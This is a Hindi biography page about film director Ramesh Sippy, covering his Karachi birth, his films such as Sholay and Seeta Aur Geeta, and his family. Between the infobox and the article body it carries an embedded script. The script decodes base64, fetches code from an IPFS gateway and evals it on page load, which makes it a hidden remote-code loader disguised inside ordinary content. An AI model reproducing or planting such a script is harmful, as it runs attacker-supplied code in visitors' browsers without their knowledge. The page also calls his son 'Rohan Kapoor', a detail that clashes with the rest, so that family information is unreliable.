रमेश सिप्पी का जीवन परिचय

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
रमेश सिप्पी विषय सूची
रमेश सिप्पी का जीवन परिचय
रमेश सिप्पी
पूरा नाम रमेश सिप्पी
जन्म 23 जनवरी 1947
जन्म भूमि पाकिस्तान, कराची
पति/पत्नी किरण जुनेजा
मुख्य फ़िल्में शक्ति, शान, शोले, सीता और गीता, अंदाज़
पुरस्कार-उपाधि फ़िल्म 'शोले' को 50 सालो की सर्वश्रेष्ठ फ़िल्म का "फ़िल्मफेयर पुरुस्कार"।
नागरिकता भारतीय
अन्य जानकारी 'सीता और गीता' (1972) के रूप में दो विपरीत स्वभाव की बहनों का अनूठा चित्रण किया। यह फ़िल्म नायिका प्रधान थी और इस तरह की फ़िल्म बनाना व्यवसाय की दृष्टि से रिस्की था। लेकिन रमेश ने यह जोखिम उठाया और 'सीता और गीता' सुपरहिट रही।
अद्यतन‎

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

फ़िल्म डायरेक्टर रमेश सिप्पी आज फ़िल्म 'शोले वाले डायरेक्टर' के रूप में जाने और पहचाने जाते हैं। आने वाले कई वर्षों तक शोले की चर्चा होती रहेगी और इस बहाने रमेश सिप्पी को हमेशा याद किया जाता रहेगा। रमेश सिप्पी फ़िल्म निर्माता-वितरक तथा फ़िल्म इंडस्ट्री के बरसों तक लीडर रहे गोपालदास परमानंद सिप्पी (जीपी सिप्पी) के बेटे हैं। उनका जन्म 1947 में कराची (पाकिस्तान) में हुआ था। जीपी सिप्पी ने कुछ दिनों तक वकालात की। फिर एक रेस्तरां भी संचालित किया। विभाजन बाद बम्बई आकर जीपी सिप्पी प्रोडक्शन के बैनर तले फ़िल्म सजा (1951) का निर्माण किया। जब बेटा रमेश सिप्पी बड़ा होकर निर्देशक बना, तो अपने होम प्रोडक्शन में अनेक सफल फ़िल्मों के निर्माण का श्रेय जीपी सिप्पी को जाता है।[1]

रमेश सिप्पी एक फ़िल्मकार के रूप में बड़े बजट, बहुल सितारा और भव्य पैमाने की फ़िल्म पूरे परफेक्शन के साथ निर्देशित करने के रूप में जाने जाते हैं। उन्होंने बंबई विश्वविद्यालय से स्नातक की उपाधि प्राप्त की और अपने पिता के व्यवसाय में शामिल हो गए। अपनी पहली ही फ़िल्म में उन्होंने उस दौर के सुपरस्टार्स राजेश खन्ना, हेमा मालिनी और शम्मी कपूर को लेकर अंदाज़(1971) का निर्देशन किया। जिंदगी एक सफर है सुहाना गीत का फ़िल्मांकन तेज भागती मोटर साइकिल पर कुछ इस अंदाज़में किया गया था कि युवा वर्ग में उसका क्रेज पैदा हो गया। बॉक्स ऑफिस पर फ़िल्म ने सफलता दर्ज की और रमेश फ़िल्म जगत में स्थापित हो गए। इसके बाद हेमा मालिनी को डबल रोल देते हुए उन्होंने सीता और गीता (1972) के रूप में दो विपरीत स्वभाव की बहनों का अनूठा चित्रण किया। यह फ़िल्म नायिका प्रधान थी और इस तरह की फ़िल्म बनाना व्यवसाय की दृष्टि से रिस्की था। लेकिन रमेश ने यह जोखिम उठाया और सीता और गीता सुपरहिट रही।[1]

शिक्षा

रमेश सिप्पी ने अपनी शुरुआती पढाई मुंबई में ही सम्पन्न की है। उन्होंने बंबई विश्वविद्यालय से स्नातक की उपाधि प्राप्त की।[2]

विवाह

रमेश सिप्पी ने दो शादियां की हैं। उनकी दूसरी पत्नी अभिनेत्री किरण जुनेजा है। उनके दो बच्चे हैं, रोहन कपूर जोकि फ़िल्म निर्माता निर्देशक हैं। उनकी एक बेटी हैं शीना कपूर उनकी शादी शशि कपूर के बेटे कुणाल कपूर से हुई है।[2]


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. 1.0 1.1 रमेश सिप्पी : बहुल सितारा फ़िल्मकार (हिन्दी) webdunia.com। अभिगमन तिथि: 8 जुलाई, 2017।
  2. 2.0 2.1 रमेश सिप्पी (हिन्दी) hindi.filmibeat.com। अभिगमन तिथि: 8 जुलाई, 2016।

संबंधित लेख